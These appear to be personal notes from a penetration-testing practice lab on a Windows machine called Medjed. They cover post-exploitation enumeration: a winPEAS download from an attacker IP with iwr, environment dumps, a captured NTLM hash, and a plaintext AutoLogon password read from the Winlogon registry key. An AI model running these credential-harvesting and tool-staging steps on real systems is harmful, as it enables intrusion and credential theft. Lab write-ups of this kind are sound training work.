PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.195/winPEASx64.exe -OutFile C:\tmp\winPEASx64.exeDelivery complete
/Practice/Medjed/4-Post_Enumeration/attachments/Pasted-image-20250411221239.png)
Executing PEAS
ENV
���������� User Environment Variables
� Check for some passwords or keys in the env variables
COMPUTERNAME: MEDJED
PSExecutionPolicyPreference: Bypass
HOMEPATH: \Users\Jerren
LOCALAPPDATA: C:\Users\Jerren\AppData\Local
PSModulePath: C:\Users\Jerren\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\Yarn\bin\;C:\Program Files (x86)\nodejs\;C:\Ruby26-x64\bin;C:\Users\Jerren\AppData\Local\Microsoft\WindowsApps;C:\Users\Jerren\AppData\Local\Yarn\bin;C:\Users\Jerren\AppData\Roaming\npm;
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
LOGONSERVER: \\MEDJED
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.RB;.RBW;.CPL
HOMEDRIVE: C:
SystemRoot: C:\WINDOWS
RUBYOPT: -Eutf-8
SESSIONNAME: Console
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
USERPROFILE: C:\Users\Jerren
AP_PARENT_PID: 6360
APPDATA: C:\Users\Jerren\AppData\Roaming
PROCESSOR_REVISION: 0101
USERNAME: Jerren
CommonProgramW6432: C:\Program Files\Common Files
OneDrive: C:\Users\Jerren\OneDrive
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
USERDOMAIN_ROAMINGPROFILE: MEDJED
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\WINDOWS\system32\cmd.exe
PROMPT: $P$G
SystemDrive: C:
TEMP: C:\Users\Jerren\AppData\Local\Temp
ProgramFiles: C:\Program Files
NUMBER_OF_PROCESSORS: 2
TMP: C:\Users\Jerren\AppData\Local\Temp
ProgramData: C:\ProgramData
ProgramW6432: C:\Program Files
windir: C:\WINDOWS
USERDOMAIN: MEDJED
PUBLIC: C:\Users\Public
���������� System Environment Variables
� Check for some passwords or keys in the env variables
ComSpec: C:\WINDOWS\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\WINDOWS\TEMP
TMP: C:\WINDOWS\TEMP
USERNAME: SYSTEM
windir: C:\WINDOWS
Path: C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\Yarn\bin\;C:\Program Files (x86)\nodejs\
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101N/A
/Practice/Medjed/4-Post_Enumeration/attachments/{0C94FBCD-4517-4845-A50B-19A0A9CF4889}.png)
UAC
/Practice/Medjed/4-Post_Enumeration/attachments/{1025C995-58B1-4A9A-B761-A471F2775454}.png)
PowerShell
/Practice/Medjed/4-Post_Enumeration/attachments/{8F97FDFB-A1BF-4ADB-834F-C60FE655AF1A}.png)
C:\Users\Jerren\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
NTLM
/Practice/Medjed/4-Post_Enumeration/attachments/{95E15A32-AD4C-4D91-A35F-4E4D6A6A91A0}.png)
/Practice/Medjed/4-Post_Enumeration/attachments/{F12B4EA8-3830-43F6-B33F-A60BBCD78E4D}.png)
Jerren::MEDJED:1122334455667788:12d2388776ee84388d1d4fa83ce40536:0101000000000000fbd7ac131eabdb0181e9e75da82d451700000000080030003000000000000000000000000020000082de34bf2a9e4fb18c2af32412bc58b0d503f4e5a563f15d0345305d8e4445210a00100000000000000000000000000000000000090000000000000000000000
.NET
/Practice/Medjed/4-Post_Enumeration/attachments/{E9B313B3-214B-40E1-B4F7-D71BCCB97A13}.png)
Token Privileges (jerren)
/Practice/Medjed/4-Post_Enumeration/attachments/{8FE53247-12BA-461E-8AFB-768472C29989}.png)
RDP Session
/Practice/Medjed/4-Post_Enumeration/attachments/{C88540F9-20E3-49A0-8791-F0A650371947}.png)
The jerren user has an RDP session
AutoLogon
/Practice/Medjed/4-Post_Enumeration/attachments/{983DB5F4-94A8-4134-B9D0-4DB2AAE29F3E}.png)
Password of the jerren user found; CatastropheToes543
PS C:\tmp> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
LastLogOffEndTimePerfCounter REG_QWORD 0x2113f6cfbd3
ShutdownFlags REG_DWORD 0x13
Userinit REG_SZ C:\Windows\system32\userinit.exe,
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ CatastropheToes543
DefaultUserName REG_SZ Jerren
DisableCad REG_DWORD 0x1
DisableLockWorkstation REG_DWORD 0x0
EnableFirstLogonAnimation REG_DWORD 0x1
AutoLogonSID REG_SZ S-1-5-21-242175207-3260895204-4250494957-1003
LastUsedUsername REG_SZ Jerren
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyConfirmed
Services
/Practice/Medjed/4-Post_Enumeration/attachments/{971D4F56-42CD-4C38-A08D-EF46C533934C}.png)
/Practice/Medjed/4-Post_Enumeration/attachments/{EC1E9497-7A5B-41CF-93F5-81BAFE200D64}.png)
/Practice/Medjed/4-Post_Enumeration/attachments/{4AC6E78D-E6B6-46D4-A64B-5B53F7EA1F9A}.png)
/Practice/Medjed/4-Post_Enumeration/attachments/{ED9AE418-0AED-4162-8294-044A8710C205}.png)
/Practice/Medjed/4-Post_Enumeration/attachments/{35BC58E6-1597-460D-8BF9-B705B4DA2A82}.png)
Interesting Services
/Practice/Medjed/4-Post_Enumeration/attachments/{F55E7615-09E6-49BB-9B50-A6CA386C5BF3}.png)
Write access to the C:\bd directory
Modifiable Services
/Practice/Medjed/4-Post_Enumeration/attachments/{969A7C5C-20A9-4FBB-9C13-18E15AC9AAA3}.png)
RmSvc: GenericExecute (Start/Stop)
wcncsvc: GenericExecute (Start/Stop)
BcastDVRUserService_4bbfd: GenericExecute (Start/Stop)
ConsentUxUserSvc_4bbfd: GenericExecute (Start/Stop)
CredentialEnrollmentManagerUserSvc_4bbfd: GenericExecute (Start/Stop)
DeviceAssociationBrokerSvc_4bbfd: GenericExecute (Start/Stop)
DevicePickerUserSvc_4bbfd: GenericExecute (Start/Stop)
DevicesFlowUserSvc_4bbfd: GenericExecute (Start/Stop)
PimIndexMaintenanceSvc_4bbfd: GenericExecute (Start/Stop)
PrintWorkflowUserSvc_4bbfd: GenericExecute (Start/Stop)
UdkUserSvc_4bbfd: GenericExecute (Start/Stop)
UnistoreSvc_4bbfd: GenericExecute (Start/Stop)
UserDataSvc_4bbfd: GenericExecute (Start/Stop)
WpnUserService_4bbfd: GenericExecute (Start/Stop)Network
/Practice/Medjed/4-Post_Enumeration/attachments/{8AC1AA65-6579-497D-B6C3-A351641A2FC4}.png)